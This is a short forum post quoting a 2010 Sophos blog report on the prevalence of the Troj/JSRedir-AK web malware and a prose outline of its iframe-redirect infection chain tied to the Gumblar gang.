FYI...
40% of a month’s malware - Troj/JSRedir-AK
- http://www.sophos.com/blogs/sophoslabs/v/post/8338
January 25, 2010 - "It has been a month since we added detection for Troj/JSRedir-AK* and figures generated today show that over 40% of all web-based detections have been from this malicious code. Translating the numbers into a more human comprehensible form: 1 site every 15 secs was being detected as Troj/JSRedir-AK. The affected sites include well-known names, including:
• Energy Companies
• Retail Companies
• Automobile Club
• Hotels
...Using the JavaScript .replace the malware deobfuscates itself and dynamically writes an iframe point to a Russian website on port 8080 which serves up scripts detected as Troj/Iframe-DL. This new script will write an iframe that will attempt to load a PDF (detected as Troj/PDFJs-FY) and a file claiming to be a JPG (detected as Exp/VidCtl-A). These then will install various other malware. Troj/JSRedir-AK is a continuation of the Gumblar gang’s exploits using Russian domains instead of Chinese ones... very similar to the one we saw for Troj/JSRedir-R and the infection mechanisms seem to be the same (i.e. FTP credentials)."
(Interesting graph available at the URL above.)
* http://www.sophos.com/security/analy...jsredirak.html
"More Info... Troj/JSRedir-AK will redirect the web browser to other malicious websites."